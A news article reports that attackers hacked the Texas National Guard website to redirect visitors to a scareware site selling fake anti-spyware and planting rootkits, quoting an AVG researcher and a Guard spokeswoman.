Attackers have hacked the website of the Texas National Guard and are using it to serve up offers of fake security software and plant rootkits on unpatched PCs, a security researcher said.
The Guard's site was hacked sometime before Wednesday, said Roger Thompson, the chief research officer of Czech Republic-based security vendor AVG Technologies. Thompson confirmed Thursday that the site was still pushing phony anti-spyware software and infecting users with a rootkit.
"It's still infective," Thompson said. "I did a refresh and [it] whacked me."
A spokeswoman for the Guard, Chief Master Sergeant Gonda Moncada, acknowledged the hack mid-day. "We are aware of the situation and are working hard to fix it," she said.
According to Thompson's original analysis, malicious code planted on the Guard site sends the visitor's browser to the hacker site. "[That's] probably in Russia," said Thompson, "[but I] can't confirm it, because the ISP for the host is not answering whois queries."
The malicious site tries to trick users into forking over money for fake security software, said Thompson. "If you're not patched, when you close your browser, you find that your desktop has changed," he said, referring to a pop-up message that claims the user's PC is infected with spyware.
"This machine is now hopelessly nailed, and code has been installed in the background, and their pitch is that they'll remove it for a mere [US]$49.95, and insert your credit card number here, please," said Thompson.
In the background, the attackers also plant a rootkit, software that hides malware to make it tougher for legitimate security software to sniff out and snuff attack code.
Moncada did not respond to other questions, including when the site would be cleansed of the malicious code and how it had got onto the site.